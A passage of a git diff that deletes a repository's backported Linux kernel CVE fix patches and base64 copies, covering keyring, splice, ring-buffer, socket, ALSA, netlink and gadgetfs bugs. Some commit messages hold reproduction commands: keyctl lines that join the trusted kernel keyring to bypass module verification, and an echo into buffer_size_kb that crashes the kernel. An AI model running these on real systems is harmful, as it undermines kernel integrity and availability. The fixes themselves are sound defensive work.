Eob3V0LT5mX21vZGUgJiBGTU9ERV9TUExJQ0VfV1JJVEUpKSkKKwkJcmV0dXJuIC1FSU5WQUw7CisKIAlyZXQgPSBzcGxpY2VfZnJvbV9waXBlKHBpcGUsIG91dCwgcHBvcywgbGVuLCBmbGFncywgd3JpdGVfcGlwZV9idWYpOwogCWlmIChyZXQgPiAwKQogCQkqcHBvcyArPSByZXQ7CmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2ZzLmggYi9pbmNsdWRlL2xpbnV4L2ZzLmgKaW5kZXggZTZmMTE4MC4uNzgzMDBlZiAxMDA2NDQKLS0tIGEvaW5jbHVkZS9saW51eC9mcy5oCisrKyBiL2luY2x1ZGUvbGludXgvZnMuaApAQCAtMTI1LDYgKzEyNSwxMSBAQAogLyogRmlsZSB3YXMgb3BlbmVkIGJ5IGZhbm90aWZ5IGFuZCBzaG91bGRuJ3QgZ2VuZXJhdGUgZmFub3RpZnkgZXZlbnRzICovCiAjZGVmaW5lIEZNT0RFX05PTk9USUZZCQkoKF9fZm9yY2UgZm1vZGVfdCkweDEwMDAwMDApCiAKKy8qIEZpbGUgY2FuIGJlIHJlYWQgdXNpbmcgc3BsaWNlICovCisjZGVmaW5lIEZNT0RFX1NQTElDRV9SRUFEICAgICAgICgoX19mb3JjZSBmbW9kZV90KTB4ODAwMDAwMCkKKy8qIEZpbGUgY2FuIGJlIHdyaXR0ZW4gdXNpbmcgc3BsaWNlICovCisjZGVmaW5lIEZNT0RFX1NQTElDRV9XUklURSAgICAgICgoX19mb3JjZSBmbW9kZV90KTB4MTAwMDAwMDApCisKIC8qCiAgKiBGbGFnIGZvciByd19jb3B5X2NoZWNrX3V2ZWN0b3IgYW5kIGNvbXBhdF9yd19jb3B5X2NoZWNrX3V2ZWN0b3IKICAqIHRoYXQgaW5kaWNhdGVzIHRoYXQgdGhleSBzaG91bGQgY2hlY2sgdGhlIGNvbnRlbnRzIG9mIHRoZSBpb3ZlYyBhcmUK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch
deleted file mode 100644
index 869807a6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From 741ab25b1f609f4ca11429b99811c4a427c60024 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Sat, 07 Jan 2017 19:14:29 +0100
-Subject: [PATCH] splice: introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE
-
-Introduce FMODE_SPLICE_READ and FMODE_SPLICE_WRITE. These modes check
-whether it is legal to read or write a file using splice. Both get
-automatically set on regular files and are not checked when a 'struct
-fileoperations' includes the splice_{read,write} methods.
-
-Change-Id: Ice6a3fab20bf0ac131f8d908f4bb0f7dc34bf4e3
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Cc: Al Viro <viro@zeniv.linux.org.uk>
-Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
----
-
-diff --git a/fs/open.c b/fs/open.c
-index 4c28c4f..7512d8a 100644
---- a/fs/open.c
-+++ b/fs/open.c
-@@ -683,6 +683,10 @@
- 		return f;
- 	}
- 
-+	if (S_ISREG(inode->i_mode))
-+		f->f_mode |= FMODE_SPLICE_WRITE | FMODE_SPLICE_READ;
-+
-+
- 	f->f_op = fops_get(inode->i_fop);
- 
- 	error = security_dentry_open(f, cred);
-diff --git a/fs/splice.c b/fs/splice.c
-index ea85353..bf597dc5 100644
---- a/fs/splice.c
-+++ b/fs/splice.c
-@@ -376,6 +376,9 @@
- 		index++;
- 	}
- 
-+	if (unlikely(!(in->f_mode & FMODE_SPLICE_READ)))
-+		return -EINVAL;
-+
- 	/*
- 	 * Now loop over the map and see if we need to start IO on any
- 	 * pages, fill in the partial map, etc.
-@@ -1059,6 +1062,9 @@
- {
- 	ssize_t ret;
- 
-+	if (unlikely(!(out->f_mode & FMODE_SPLICE_WRITE)))
-+		return -EINVAL;
-+
- 	ret = splice_from_pipe(pipe, out, ppos, len, flags, write_pipe_buf);
- 	if (ret > 0)
- 		*ppos += ret;
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 0e03633..ef0590d 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -117,6 +117,11 @@
- /* File was opened by fanotify and shouldn't generate fanotify events */
- #define FMODE_NONOTIFY		((__force fmode_t)0x1000000)
- 
-+/* File can be read using splice */
-+#define FMODE_SPLICE_READ       ((__force fmode_t)0x8000000)
-+/* File can be written using splice */
-+#define FMODE_SPLICE_WRITE      ((__force fmode_t)0x10000000)
-+
- /*
-  * The below are the various read and write types that we support. Some of
-  * them include behavioral modifiers that send information down to the
diff --git a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch.base64
deleted file mode 100644
index 324e9bc2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9576/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA3NDFhYjI1YjFmNjA5ZjRjYTExNDI5Yjk5ODExYzRhNDI3YzYwMDI0IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+CkRhdGU6IFNhdCwgMDcgSmFuIDIwMTcgMTk6MTQ6MjkgKzAxMDAKU3ViamVjdDogW1BBVENIXSBzcGxpY2U6IGludHJvZHVjZSBGTU9ERV9TUExJQ0VfUkVBRCBhbmQgRk1PREVfU1BMSUNFX1dSSVRFCgpJbnRyb2R1Y2UgRk1PREVfU1BMSUNFX1JFQUQgYW5kIEZNT0RFX1NQTElDRV9XUklURS4gVGhlc2UgbW9kZXMgY2hlY2sKd2hldGhlciBpdCBpcyBsZWdhbCB0byByZWFkIG9yIHdyaXRlIGEgZmlsZSB1c2luZyBzcGxpY2UuIEJvdGggZ2V0CmF1dG9tYXRpY2FsbHkgc2V0IG9uIHJlZ3VsYXIgZmlsZXMgYW5kIGFyZSBub3QgY2hlY2tlZCB3aGVuIGEgJ3N0cnVjdApmaWxlb3BlcmF0aW9ucycgaW5jbHVkZXMgdGhlIHNwbGljZV97cmVhZCx3cml0ZX0gbWV0aG9kcy4KCkNoYW5nZS1JZDogSWNlNmEzZmFiMjBiZjBhYzEzMWY4ZDkwOGY0YmIwZjdkYzM0YmY0ZTMKU3VnZ2VzdGVkLWJ5OiBMaW51cyBUb3J2YWxkcyA8dG9ydmFsZHNAbGludXgtZm91bmRhdGlvbi5vcmc+CkNjOiBBbCBWaXJvIDx2aXJvQHplbml2LmxpbnV4Lm9yZy51az4KU2lnbmVkLW9mZi1ieTogSm9oYW5uZXMgVGh1bXNoaXJuIDxqdGh1bXNoaXJuQHN1c2UuZGU+Ci0tLQoKZGlmZiAtLWdpdCBhL2ZzL29wZW4uYyBiL2ZzL29wZW4uYwppbmRleCA0YzI4YzRmLi43NTEyZDhhIDEwMDY0NAotLS0gYS9mcy9vcGVuLmMKKysrIGIvZnMvb3Blbi5jCkBAIC02ODMsNiArNjgzLDEwIEBACiAJCXJldHVybiBmOwogCX0KIAorCWlmIChTX0lTUkVHKGlub2RlLT5pX21vZGUpKQorCQlmLT5mX21vZGUgfD0gRk1PREVfU1BMSUNFX1dSSVRFIHwgRk1PREVfU1BMSUNFX1JFQUQ7CisKKwogCWYtPmZfb3AgPSBmb3BzX2dldChpbm9kZS0+aV9mb3ApOwogCiAJZXJyb3IgPSBzZWN1cml0eV9kZW50cnlfb3BlbihmLCBjcmVkKTsKZGlmZiAtLWdpdCBhL2ZzL3NwbGljZS5jIGIvZnMvc3BsaWNlLmMKaW5kZXggZWE4NTM1My4uYmY1OTdkYzUgMTAwNjQ0Ci0tLSBhL2ZzL3NwbGljZS5jCisrKyBiL2ZzL3NwbGljZS5jCkBAIC0zNzYsNiArMzc2LDkgQEAKIAkJaW5kZXgrKzsKIAl9CiAKKwlpZiAodW5saWtlbHkoIShpbi0+Zl9tb2RlICYgRk1PREVfU1BMSUNFX1JFQUQpKSkKKwkJcmV0dXJuIC1FSU5WQUw7CisKIAkvKgogCSAqIE5vdyBsb29wIG92ZXIgdGhlIG1hcCBhbmQgc2VlIGlmIHdlIG5lZWQgdG8gc3RhcnQgSU8gb24gYW55CiAJICogcGFnZXMsIGZpbGwgaW4gdGhlIHBhcnRpYWwgbWFwLCBldGMuCkBAIC0xMDU5LDYgKzEwNjIsOSBAQAogewogCXNzaXplX3QgcmV0OwogCisJaWYgKHVubGlrZWx5KCEob3V0LT5mX21vZGUgJiBGTU9ERV9TUExJQ0VfV1JJVEUpKSkKKwkJcmV0dXJuIC1FSU5WQUw7CisKIAlyZXQgPSBzcGxpY2VfZnJvbV9waXBlKHBpcGUsIG91dCwgcHBvcywgbGVuLCBmbGFncywgd3JpdGVfcGlwZV9idWYpOwogCWlmIChyZXQgPiAwKQogCQkqcHBvcyArPSByZXQ7CmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2ZzLmggYi9pbmNsdWRlL2xpbnV4L2ZzLmgKaW5kZXggMGUwMzYzMy4uZWYwNTkwZCAxMDA2NDQKLS0tIGEvaW5jbHVkZS9saW51eC9mcy5oCisrKyBiL2luY2x1ZGUvbGludXgvZnMuaApAQCAtMTE3LDYgKzExNywxMSBAQAogLyogRmlsZSB3YXMgb3BlbmVkIGJ5IGZhbm90aWZ5IGFuZCBzaG91bGRuJ3QgZ2VuZXJhdGUgZmFub3RpZnkgZXZlbnRzICovCiAjZGVmaW5lIEZNT0RFX05PTk9USUZZCQkoKF9fZm9yY2UgZm1vZGVfdCkweDEwMDAwMDApCiAKKy8qIEZpbGUgY2FuIGJlIHJlYWQgdXNpbmcgc3BsaWNlICovCisjZGVmaW5lIEZNT0RFX1NQTElDRV9SRUFEICAgICAgICgoX19mb3JjZSBmbW9kZV90KTB4ODAwMDAwMCkKKy8qIEZpbGUgY2FuIGJlIHdyaXR0ZW4gdXNpbmcgc3BsaWNlICovCisjZGVmaW5lIEZNT0RFX1NQTElDRV9XUklURSAgICAgICgoX19mb3JjZSBmbW9kZV90KTB4MTAwMDAwMDApCisKIC8qCiAgKiBUaGUgYmVsb3cgYXJlIHRoZSB2YXJpb3VzIHJlYWQgYW5kIHdyaXRlIHR5cGVzIHRoYXQgd2Ugc3VwcG9ydC4gU29tZSBvZgogICogdGhlbSBpbmNsdWRlIGJlaGF2aW9yYWwgbW9kaWZpZXJzIHRoYXQgc2VuZCBpbmZvcm1hdGlvbiBkb3duIHRvIHRoZQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-9576/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-9576/ANY/0003.patch
deleted file mode 100644
index a640c7fc..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9576/ANY/0003.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From a0ac402cfcdc904f9772e1762b3fda112dcc56a0 Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Tue, 6 Dec 2016 16:18:14 -0800
-Subject: [PATCH] Don't feed anything but regular iovec's to
- blk_rq_map_user_iov
-
-In theory we could map other things, but there's a reason that function
-is called "user_iov".  Using anything else (like splice can do) just
-confuses it.
-
-Reported-and-tested-by: Johannes Thumshirn <jthumshirn@suse.de>
-Cc: Al Viro <viro@ZenIV.linux.org.uk>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- block/blk-map.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/block/blk-map.c b/block/blk-map.c
-index b8657fa8dc9af..27fd8d92892d4 100644
---- a/block/blk-map.c
-+++ b/block/blk-map.c
-@@ -118,6 +118,9 @@ int blk_rq_map_user_iov(struct request_queue *q, struct request *rq,
- 	struct iov_iter i;
- 	int ret;
- 
-+	if (!iter_is_iovec(iter))
-+		goto fail;
-+
- 	if (map_data)
- 		copy = true;
- 	else if (iov_iter_alignment(iter) & align)
-@@ -140,6 +143,7 @@ int blk_rq_map_user_iov(struct request_queue *q, struct request *rq,
- 
- unmap_rq:
- 	__blk_rq_unmap_user(bio);
-+fail:
- 	rq->bio = NULL;
- 	return -EINVAL;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-9604/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9604/ANY/0001.patch
deleted file mode 100644
index 3aeadfbb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9604/ANY/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 44c037827f0aeddbbbb323930fa3d09a7b4fffca Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Tue, 18 Apr 2017 15:31:07 +0100
-Subject: KEYS: Disallow keyrings beginning with '.' to be joined as session
- keyrings
-
-commit ee8f844e3c5a73b999edf733df1c529d6503ec2f upstream.
-
-This fixes CVE-2016-9604.
-
-Keyrings whose name begin with a '.' are special internal keyrings and so
-userspace isn't allowed to create keyrings by this name to prevent
-shadowing.  However, the patch that added the guard didn't fix
-KEYCTL_JOIN_SESSION_KEYRING.  Not only can that create dot-named keyrings,
-it can also subscribe to them as a session keyring if they grant SEARCH
-permission to the user.
-
-This, for example, allows a root process to set .builtin_trusted_keys as
-its session keyring, at which point it has full access because now the
-possessor permissions are added.  This permits root to add extra public
-keys, thereby bypassing module verification.
-
-This also affects kexec and IMA.
-
-This can be tested by (as root):
-
-	keyctl session .builtin_trusted_keys
-	keyctl add user a a @s
-	keyctl list @s
-
-which on my test box gives me:
-
-	2 keys in keyring:
-	180010936: ---lswrv     0     0 asymmetric: Build time autogenerated kernel key: ae3d4a31b82daa8e1a75b49dc2bba949fd992a05
-	801382539: --alswrv     0     0 user: a
-
-
-Fix this by rejecting names beginning with a '.' in the keyctl.
-
-Signed-off-by: David Howells <dhowells@redhat.com>
-Acked-by: Mimi Zohar <zohar@linux.vnet.ibm.com>
-cc: linux-ima-devel@lists.sourceforge.net
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- security/keys/keyctl.c | 9 +++++++--
- 1 file changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/security/keys/keyctl.c b/security/keys/keyctl.c
-index fee27fe..af86b35 100644
---- a/security/keys/keyctl.c
-+++ b/security/keys/keyctl.c
-@@ -277,7 +277,8 @@ error:
-  * Create and join an anonymous session keyring or join a named session
-  * keyring, creating it if necessary.  A named session keyring must have Search
-  * permission for it to be joined.  Session keyrings without this permit will
-- * be skipped over.
-+ * be skipped over.  It is not permitted for userspace to create or join
-+ * keyrings whose name begin with a dot.
-  *
-  * If successful, the ID of the joined session keyring will be returned.
-  */
-@@ -294,12 +295,16 @@ long keyctl_join_session_keyring(const char __user *_name)
- 			ret = PTR_ERR(name);
- 			goto error;
- 		}
-+
-+		ret = -EPERM;
-+		if (name[0] == '.')
-+			goto error_name;
- 	}
- 
- 	/* join the session */
- 	ret = join_session_keyring(name);
-+error_name:
- 	kfree(name);
--
- error:
- 	return ret;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-9754/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9754/ANY/0001.patch
deleted file mode 100644
index 50952d96..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9754/ANY/0001.patch
+++ /dev/null
@@ -1,89 +0,0 @@
-From 59643d1535eb220668692a5359de22545af579f6 Mon Sep 17 00:00:00 2001
-From: "Steven Rostedt (Red Hat)" <rostedt@goodmis.org>
-Date: Fri, 13 May 2016 09:34:12 -0400
-Subject: ring-buffer: Prevent overflow of size in ring_buffer_resize()
-
-If the size passed to ring_buffer_resize() is greater than MAX_LONG - BUF_PAGE_SIZE
-then the DIV_ROUND_UP() will return zero.
-
-Here's the details:
-
-  # echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb
-
-tracing_entries_write() processes this and converts kb to bytes.
-
- 18014398509481980 << 10 = 18446744073709547520
-
-and this is passed to ring_buffer_resize() as unsigned long size.
-
- size = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
-
-Where DIV_ROUND_UP(a, b) is (a + b - 1)/b
-
-BUF_PAGE_SIZE is 4080 and here
-
- 18446744073709547520 + 4080 - 1 = 18446744073709551599
-
-where 18446744073709551599 is still smaller than 2^64
-
- 2^64 - 18446744073709551599 = 17
-
-But now 18446744073709551599 / 4080 = 4521260802379792
-
-and size = size * 4080 = 18446744073709551360
-
-This is checked to make sure its still greater than 2 * 4080,
-which it is.
-
-Then we convert to the number of buffer pages needed.
-
- nr_page = DIV_ROUND_UP(size, BUF_PAGE_SIZE)
-
-but this time size is 18446744073709551360 and
-
- 2^64 - (18446744073709551360 + 4080 - 1) = -3823
-
-Thus it overflows and the resulting number is less than 4080, which makes
-
-  3823 / 4080 = 0
-
-an nr_pages is set to this. As we already checked against the minimum that
-nr_pages may be, this causes the logic to fail as well, and we crash the
-kernel.
-
-There's no reason to have the two DIV_ROUND_UP() (that's just result of
-historical code changes), clean up the code and fix this bug.
-
-Cc: stable@vger.kernel.org # 3.5+
-Fixes: 83f40318dab00 ("ring-buffer: Make removal of ring buffer pages atomic")
-Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
----
- kernel/trace/ring_buffer.c | 9 ++++-----
- 1 file changed, 4 insertions(+), 5 deletions(-)
-
-diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
-index 99d64cd..9c14373 100644
---- a/kernel/trace/ring_buffer.c
-+++ b/kernel/trace/ring_buffer.c
-@@ -1657,14 +1657,13 @@ int ring_buffer_resize(struct ring_buffer *buffer, unsigned long size,
- 	    !cpumask_test_cpu(cpu_id, buffer->cpumask))
- 		return size;
- 
--	size = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
--	size *= BUF_PAGE_SIZE;
-+	nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
- 
- 	/* we need a minimum of two pages */
--	if (size < BUF_PAGE_SIZE * 2)
--		size = BUF_PAGE_SIZE * 2;
-+	if (nr_pages < 2)
-+		nr_pages = 2;
- 
--	nr_pages = DIV_ROUND_UP(size, BUF_PAGE_SIZE);
-+	size = nr_pages * BUF_PAGE_SIZE;
- 
- 	/*
- 	 * Don't succeed if resizing is disabled, as a reader might be
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-9793/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9793/ANY/0001.patch
deleted file mode 100644
index 2f44e337..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9793/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From b98b0bc8c431e3ceb4b26b0dfc8db509518fb290 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Fri, 2 Dec 2016 09:44:53 -0800
-Subject: net: avoid signed overflows for SO_{SND|RCV}BUFFORCE
-
-CAP_NET_ADMIN users should not be allowed to set negative
-sk_sndbuf or sk_rcvbuf values, as it can lead to various memory
-corruptions, crashes, OOM...
-
-Note that before commit 82981930125a ("net: cleanups in
-sock_setsockopt()"), the bug was even more serious, since SO_SNDBUF
-and SO_RCVBUF were vulnerable.
-
-This needs to be backported to all known linux kernels.
-
-Again, many thanks to syzkaller team for discovering this gem.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/core/sock.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/net/core/sock.c b/net/core/sock.c
-index 5e3ca41..00a074d 100644
---- a/net/core/sock.c
-+++ b/net/core/sock.c
-@@ -715,7 +715,7 @@ int sock_setsockopt(struct socket *sock, int level, int optname,
- 		val = min_t(u32, val, sysctl_wmem_max);
- set_sndbuf:
- 		sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
--		sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
-+		sk->sk_sndbuf = max_t(int, val * 2, SOCK_MIN_SNDBUF);
- 		/* Wake up sending tasks if we upped the value. */
- 		sk->sk_write_space(sk);
- 		break;
-@@ -751,7 +751,7 @@ set_rcvbuf:
- 		 * returning the value we actually used in getsockopt
- 		 * is the most desirable behavior.
- 		 */
--		sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
-+		sk->sk_rcvbuf = max_t(int, val * 2, SOCK_MIN_RCVBUF);
- 		break;
- 
- 	case SO_RCVBUFFORCE:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-9794/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9794/ANY/0001.patch
deleted file mode 100644
index 5c2df6c8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9794/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From a27178e05b7c332522df40904f27674e36ee3757 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Mon, 12 Dec 2016 17:33:06 +0100
-Subject: ALSA: pcm : Call kill_fasync() in stream lock
-
-commit 3aa02cb664c5fb1042958c8d1aa8c35055a2ebc4 upstream.
-
-Currently kill_fasync() is called outside the stream lock in
-snd_pcm_period_elapsed().  This is potentially racy, since the stream
-may get released even during the irq handler is running.  Although
-snd_pcm_release_substream() calls snd_pcm_drop(), this doesn't
-guarantee that the irq handler finishes, thus the kill_fasync() call
-outside the stream spin lock may be invoked after the substream is
-detached, as recently reported by KASAN.
-
-As a quick workaround, move kill_fasync() call inside the stream
-lock.  The fasync is rarely used interface, so this shouldn't have a
-big impact from the performance POV.
-
-Ideally, we should implement some sync mechanism for the proper finish
-of stream and irq handler.  But this oneliner should suffice for most
-cases, so far.
-
-Reported-by: Baozeng Ding <sploving1@gmail.com>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
- sound/core/pcm_lib.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/core/pcm_lib.c b/sound/core/pcm_lib.c
-index 8eddece..dfed3ef 100644
---- a/sound/core/pcm_lib.c
-+++ b/sound/core/pcm_lib.c
-@@ -1856,10 +1856,10 @@ void snd_pcm_period_elapsed(struct snd_pcm_substream *substream)
- 	if (substream->timer_running)
- 		snd_timer_interrupt(substream->timer, 1);
-  _end:
-+	kill_fasync(&runtime->fasync, SIGIO, POLL_IN);
- 	snd_pcm_stream_unlock_irqrestore(substream, flags);
- 	if (runtime->transfer_ack_end)
- 		runtime->transfer_ack_end(substream);
--	kill_fasync(&runtime->fasync, SIGIO, POLL_IN);
- }
- 
- EXPORT_SYMBOL(snd_pcm_period_elapsed);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-9806/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-9806/ANY/0001.patch
deleted file mode 100644
index 9c899b7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-9806/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 92964c79b357efd980812c4de5c1fd2ec8bb5520 Mon Sep 17 00:00:00 2001
-From: Herbert Xu <herbert@gondor.apana.org.au>
-Date: Mon, 16 May 2016 17:28:16 +0800
-Subject: netlink: Fix dump skb leak/double free
-
-When we free cb->skb after a dump, we do it after releasing the
-lock.  This means that a new dump could have started in the time
-being and we'll end up freeing their skb instead of ours.
-
-This patch saves the skb and module before we unlock so we free
-the right memory.
-
-Fixes: 16b304f3404f ("netlink: Eliminate kmalloc in netlink dump operation.")
-Reported-by: Baozeng Ding <sploving1@gmail.com>
-Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
-Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/netlink/af_netlink.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
-index aeefe12..627f898 100644
---- a/net/netlink/af_netlink.c
-+++ b/net/netlink/af_netlink.c
-@@ -2059,6 +2059,7 @@ static int netlink_dump(struct sock *sk)
- 	struct netlink_callback *cb;
- 	struct sk_buff *skb = NULL;
- 	struct nlmsghdr *nlh;
-+	struct module *module;
- 	int len, err = -ENOBUFS;
- 	int alloc_min_size;
- 	int alloc_size;
-@@ -2134,9 +2135,11 @@ static int netlink_dump(struct sock *sk)
- 		cb->done(cb);
- 
- 	nlk->cb_running = false;
-+	module = cb->module;
-+	skb = cb->skb;
- 	mutex_unlock(nlk->cb_mutex);
--	module_put(cb->module);
--	consume_skb(cb->skb);
-+	module_put(module);
-+	consume_skb(skb);
- 	return 0;
- 
- errout_skb:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0001.patch
deleted file mode 100644
index b6cd2b4b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 0173a68bfb0ad1c72a6ee39cc485aa2c97540b98 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Tue, 26 Sep 2017 15:15:40 -0400
-Subject: [PATCH] USB: dummy-hcd: fix infinite-loop resubmission bug
-
-The dummy-hcd HCD/UDC emulator tries not to do too much work during
-each timer interrupt.  But it doesn't try very hard; currently all
-it does is limit the total amount of bulk data transferred.  Other
-transfer types aren't limited, and URBs that transfer no data (because
-of an error, perhaps) don't count toward the limit, even though on a
-real USB bus they would consume at least a minimum overhead.
-
-This means it's possible to get the driver stuck in an infinite loop,
-for example, if the host class driver resubmits an URB every time it
-completes (which is common for interrupt URBs).  Each time the URB is
-resubmitted it gets added to the end of the pending-URBs list, and
-dummy-hcd doesn't stop until that list is empty.  Andrey Konovalov was
-able to trigger this failure mode using the syzkaller fuzzer.
-
-This patch fixes the infinite-loop problem by restricting the URBs
-handled during each timer interrupt to those that were already on the
-pending list when the interrupt routine started.  Newly added URBs
-won't be processed until the next timer interrupt.  The problem of
-properly accounting for non-bulk bandwidth (as well as packet and
-transaction overhead) is not addressed here.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/udc/dummy_hcd.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/drivers/usb/gadget/udc/dummy_hcd.c b/drivers/usb/gadget/udc/dummy_hcd.c
-index d515ec31afe44..b2ab9cc33fec4 100644
---- a/drivers/usb/gadget/udc/dummy_hcd.c
-+++ b/drivers/usb/gadget/udc/dummy_hcd.c
-@@ -237,6 +237,8 @@ struct dummy_hcd {
- 
- 	struct usb_device		*udev;
- 	struct list_head		urbp_list;
-+	struct urbp			*next_frame_urbp;
-+
- 	u32				stream_en_ep;
- 	u8				num_stream[30 / 2];
- 
-@@ -1250,6 +1252,8 @@ static int dummy_urb_enqueue(
- 
- 	list_add_tail(&urbp->urbp_list, &dum_hcd->urbp_list);
- 	urb->hcpriv = urbp;
-+	if (!dum_hcd->next_frame_urbp)
-+		dum_hcd->next_frame_urbp = urbp;
- 	if (usb_pipetype(urb->pipe) == PIPE_CONTROL)
- 		urb->error_count = 1;		/* mark as a new urb */
- 
-@@ -1766,6 +1770,7 @@ static void dummy_timer(unsigned long _dum_hcd)
- 		spin_unlock_irqrestore(&dum->lock, flags);
- 		return;
- 	}
-+	dum_hcd->next_frame_urbp = NULL;
- 
- 	for (i = 0; i < DUMMY_ENDPOINTS; i++) {
- 		if (!ep_info[i].name)
-@@ -1782,6 +1787,10 @@ static void dummy_timer(unsigned long _dum_hcd)
- 		int			type;
- 		int			status = -EINPROGRESS;
- 
-+		/* stop when we reach URBs queued after the timer interrupt */
-+		if (urbp == dum_hcd->next_frame_urbp)
-+			break;
-+
- 		urb = urbp->urb;
- 		if (urb->unlinked)
- 			goto return_urb;
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0002.patch
deleted file mode 100644
index dc975650..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0002.patch
+++ /dev/null
@@ -1,186 +0,0 @@
-From 520b72fc64debf8a86c3853b8e486aa5982188f0 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Thu, 21 Sep 2017 13:23:58 -0400
-Subject: [PATCH] USB: gadgetfs: Fix crash caused by inadequate synchronization
-
-The gadgetfs driver (drivers/usb/gadget/legacy/inode.c) was written
-before the UDC and composite frameworks were adopted; it is a legacy
-driver.  As such, it expects that once bound to a UDC controller, it
-will not be unbound until it unregisters itself.
-
-However, the UDC framework does unbind function drivers while they are
-still registered.  When this happens, it can cause the gadgetfs driver
-to misbehave or crash.  For example, userspace can cause a crash by
-opening the device file and doing an ioctl call before setting up a
-configuration (found by Andrey Konovalov using the syzkaller fuzzer).
-
-This patch adds checks and synchronization to prevent these bad
-behaviors.  It adds a udc_usage counter that the driver increments at
-times when it is using a gadget interface without holding the private
-spinlock.  The unbind routine waits for this counter to go to 0 before
